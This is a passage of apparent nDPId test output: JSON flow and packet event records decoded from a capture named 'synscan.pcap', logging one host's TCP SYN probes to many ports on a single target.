
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuAAADcG8pKsEAAIQA2GNIzTAirdU4MZAAAAAGACEAAmYgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsiYkAADgGhumsEAAIQA2GNIzTAQDdU4MZAAAAAGACBAAzjAAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsvMkAADoGUamsEAAIQA2GNIzTAb3dU4MZAAAAAGACDAAqzwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsDW0AACkGEgasEAAIQA2GNIzTBrjdU4MZAAAAAGACCAAp1AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs+D0AACgGKDWsEAAIQA2GNIzTH5DdU4MZAAAAAGACBAAU\/AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAscb8AACUGsbOsEAAIQA2GNIzTAG7dU4MZAAAAAGACCAAwHgAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs2D8AAC8GQTOsEAAIQA2GNIzTA+HdU4MZAAAAAGACEAAkqwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AAC8GAtSsEAAIQA2GNIzTBrvdU4MZAAAAAGACEAAh0QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs2rAAAC0GQMKsEAAIQA2GNIzTC+rdU4MZAAAAAGACCAAkogAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs6RgAADsGJFqsEAAIQA2GNIzTAqvdU4MZAAAAAGACEAAl4QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsrkMAACgGci+sEAAIQA2GNIzTIB7dU4MZAAAAAGACBAAUbgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3MAACYGdv+sEAAIQA2GNIzTBYndU4MZAAAAAGACDAAnAwAAAgQFtA=="} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsZBoAADAGtFisEAAIQA2GNIzTAAbdU4MZAAAAAGACBAA0hgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdMAACkG\/Z+sEAAIQA2GNIzTB+7dU4MZAAAAAGACCAAongAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZYAADEG5dysEAAIQA2GNIzTBNHdU4MZAAAAAGACCAAruwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsFYYAADEGAe2sEAAIQA2GNIzTBpfdU4MZAAAAAGACCAAp9QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKYAADsGBM2sEAAIQA2GNIzTF3DdU4MZAAAAAGACEAARHAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsV0YAACkGyCysEAAIQA2GNIzTCK7dU4MZAAAAAGACCAAn3gAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsJAgAADIG8mqsEAAIQA2GNIzTFSbdU4MZAAAAAGACDAAXZgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAssoIAADUGYPCsEAAIQA2GNIzTA97dU4MZAAAAAGACCAAsrgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsjhQAACYGlF6sEAAIQA2GNIzTKX3dU4MZAAAAAGACDAADDwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAslV0AADoGeRWsEAAIQA2GNIzTCi3dU4MZAAAAAGACDAAiXwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsFwUAADIG\/22sEAAIQA2GNIzTKYXdU4MZAAAAAGACDAADBwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsnWIAACcGhBCsEAAIQA2GNIzTBCDdU4MZAAAAAGACEAAkbAAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 